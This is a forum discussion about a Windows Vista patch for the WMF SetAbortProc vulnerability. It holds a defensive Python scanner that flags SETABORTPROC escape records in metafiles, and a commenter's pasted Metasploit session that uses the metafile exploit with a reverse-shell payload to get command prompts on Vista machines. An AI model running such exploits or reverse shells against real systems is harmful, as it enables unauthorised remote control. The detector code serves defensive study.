First Windows Vista Security Update Released
Bard Of Vim writes "Microsoft has issued critical security patches for beta testers running the Windows Vista December CTP (Community Technology Preview) and Windows Vista Beta 1, and warned that the new operating system was vulnerable to a remote code execution flaw in the Graphics Rendering Engine. The Vista patches address the same vulnerability that led to the WMF (Windows Metafile) malware attacks earlier this month. The recent out-of-cycle security update for the WMF vulnerability (see slashdot coverage) makes no mention of Windows Vista being vulnerable, but with the release of this weekend's patches it is clear that the poorly designed 'SetAbortProc,' the function that allows printing jobs to be canceled, was ported over to Vista."
"poorly designed 'SetAbortProc,' the function that allows printing jobs to be canceled, was ported over to Vista."
SetAbortProc is well designed. The problem is the code that handles the WMF. That code is allowing a payload to be placed on the stack and an incorrect pointer to be sent.
All SetAbortProc does is send an abort code to the print job and set a callback method to call when the abort completes.
-Rick
"Most people in the U.S. wouldn't know they live in a tyrannical state if it walked up and grabbed their junk." - MyFirs
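The point Rick makes is that the problem sits in the metafile parser, not in the SetAbortProc API: a WMF file can carry a META_ESCAPE record whose escape code is SETABORTPROC, and the bytes that follow are what GDI ends up treating as the callback. The scanner below is an added example (not code from Rick, the story, or Microsoft) that walks the WMF record stream and flags exactly that record, plus records whose rdSize is too small to be sane. The structure constants (18-byte standard header, 22-byte placeable header, 6-byte record header, META_ESCAPE = 0x0626, SETABORTPROC = 9) are from the WMF format; the sample files, including the 0xCC "callback" bytes, are constructed here purely so the scanner has something to run on.

```python
import struct

# Fixed values from the Windows Metafile format
PLACEABLE_MAGIC = 0x9AC6CDD7   # little-endian dword at offset 0 of a placeable (APM) WMF
PLACEABLE_HEADER_LEN = 22
STD_HEADER_LEN = 18            # mtType, mtHeaderSize, mtVersion, mtSize, mtNoObjects, mtMaxRecord, mtNoParameters
META_EOF = 0x0000
META_SETBKCOLOR = 0x0201       # harmless record used in the benign sample
META_ESCAPE = 0x0626
SETABORTPROC = 0x0009          # escape code that hands GDI a "callback" out of the file


def wmf_records(data):
    """Walk the WMF record stream.

    Yields (offset, rd_size_bytes, rd_function, params) per record and stops at
    META_EOF, at the end of the buffer, or at the first record whose rdSize is
    inconsistent (smaller than its own 6-byte header, or running past the end of
    the file). The inconsistent record is still yielded so the caller can flag it.
    """
    off = 0
    if len(data) >= 4 and struct.unpack_from("<I", data, 0)[0] == PLACEABLE_MAGIC:
        off = PLACEABLE_HEADER_LEN
    if len(data) < off + STD_HEADER_LEN:
        raise ValueError("truncated WMF header")
    hdr_words = struct.unpack_from("<H", data, off + 2)[0]   # mtHeaderSize, in 16-bit words
    off += hdr_words * 2
    while off + 6 <= len(data):
        rd_words, rd_func = struct.unpack_from("<IH", data, off)   # rdSize (words), rdFunction
        rd_bytes = rd_words * 2
        if rd_bytes < 6 or off + rd_bytes > len(data):
            # Malformed size: hand back whatever follows the header and stop walking.
            yield off, rd_bytes, rd_func, data[off + 6:]
            return
        yield off, rd_bytes, rd_func, data[off + 6:off + rd_bytes]
        if rd_func == META_EOF:
            return
        off += rd_bytes


def scan_wmf(data):
    """Return a list of (offset, reason) findings for records an image viewer never needs."""
    findings = []
    for off, rd_bytes, rd_func, params in wmf_records(data):
        if rd_bytes < 6 or off + rd_bytes > len(data):
            findings.append((off, "malformed rdSize %d" % rd_bytes))
        if rd_func == META_ESCAPE:
            if len(params) < 4:
                findings.append((off, "META_ESCAPE with truncated parameters"))
                continue
            esc, count = struct.unpack_from("<HH", params, 0)   # escape code, byte count
            if esc == SETABORTPROC:
                findings.append((off, "META_ESCAPE SETABORTPROC (%d bytes of callback data)" % count))
            else:
                findings.append((off, "META_ESCAPE code 0x%04x" % esc))
    return findings


def build_sample(with_abortproc=True, bogus_size=False):
    """Constructed test input (not a real malware sample): a minimal disk metafile."""
    setbk = struct.pack("<IH", 5, META_SETBKCOLOR) + struct.pack("<I", 0x00FFFFFF)
    fake_callback = b"\xcc" * 8   # stand-in bytes; a real exploit would place code here
    esc_params = struct.pack("<HH", SETABORTPROC, len(fake_callback)) + fake_callback
    rd_words = 1 if bogus_size else (6 + len(esc_params)) // 2
    escape = struct.pack("<IH", rd_words, META_ESCAPE) + esc_params
    eof = struct.pack("<IH", 3, META_EOF)
    body = setbk + (escape if with_abortproc else b"") + eof
    total_words = (STD_HEADER_LEN + len(body)) // 2
    header = struct.pack("<HHHIHIH", 2, 9, 0x0300, total_words, 0, 9, 0)
    return header + body


if __name__ == "__main__":
    for label, blob in (("benign", build_sample(False)), ("abortproc", build_sample(True)),
                        ("abortproc+bogus size", build_sample(True, True))):
        print(label, scan_wmf(blob))
```

The check is deliberately narrow: a benign picture has no reason to carry a printer escape at all, so any META_ESCAPE, and SETABORTPROC in particular, is worth quarantining regardless of what the parser on the other end does with it.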
I posted something about Vista being vulnerable to the WMF thing in a Vista Kernel post here not long ago. They got a little mad at me but that is okay. Everyone has to be mad at someone!
People were telling me you can't automatically exploit it, but I fired up Metasploit and was successful with the admin account and a non-priv account.
Administrator
msf ie_xp_pfv_metafile(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Waiting for connections to http://10.1.1.101:8080/
[*] HTTP Client connected from 10.1.1.106:49450, redirecting...
[*] HTTP Client connected from 10.1.1.106:49451, redirecting...
[*] HTTP Client connected from 10.1.1.106:49452, redirecting...
[*] HTTP Client connected from 10.1.1.106:49453, sending 1864 bytes of payload...
[*] Got connection from 10.1.1.101:4321 10.1.1.106:49454
Microsoft Windows [Version 6.0.5112]
(C) Copyright 1985-2005 Microsoft Corp.
E:\Users\Administrator\Desktop>
Test account
msf ie_xp_pfv_metafile(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Waiting for connections to http://10.1.1.101:8080/
[*] HTTP Client connected from 10.1.1.106:49487, redirecting...
[*] HTTP Client connected from 10.1.1.106:49488, redirecting...
[*] HTTP Client connected from 10.1.1.106:49489, sending 1864 bytes of payload...
[*] Got connection from 10.1.1.101:4321 10.1.1.106:49490
Microsoft Windows [Version 6.0.5112]
(C) Copyright 1985-2005 Microsoft Corp.
E:\Users\test\Desktop>
I am wondering what else they are going to import from the old technology. I was a Windows fan up until this WMF dealio. I work in an Information Security office and all of our staff are going to Mac. Ordered them Friday!
Actually, .NET 2.0 runs on everything short of Win95 AFAIK. Vista isn't about .NET 2.0 whatsoever, it's about a bunch of other new technologies:
WPF: Windows Presentation Framework ("avalon"; using XAML): what WinFX and the new AERO Shell are based on;
WCF: Windows Communication Foundation ("indigo": an enhancement to Web Services, MSMQ, etc);
WWF: Windows Workflow Foundation, to help take care of scenarios like the one that was asked on "ask.slashdot.org" just yesterday. Something that's becoming increasingly common/important nowadays.
People like to just dismiss Vista like it has nothing new or worthwhile, ignoring all the new stuff that actually IS there, not just the previous 3 things mentioned, but there's a great deal of other changes (video drivers not in kernel mode anymore, new audio and printing (both work quite differently), GUI rendered by the
There are differences. It may not be worthwhile to everyone, but as a programmer I'm looking forward to many of these advances (WCF seems really nice). Saying Vista is about .NET 2 and that people don't care about that is uninformed at best...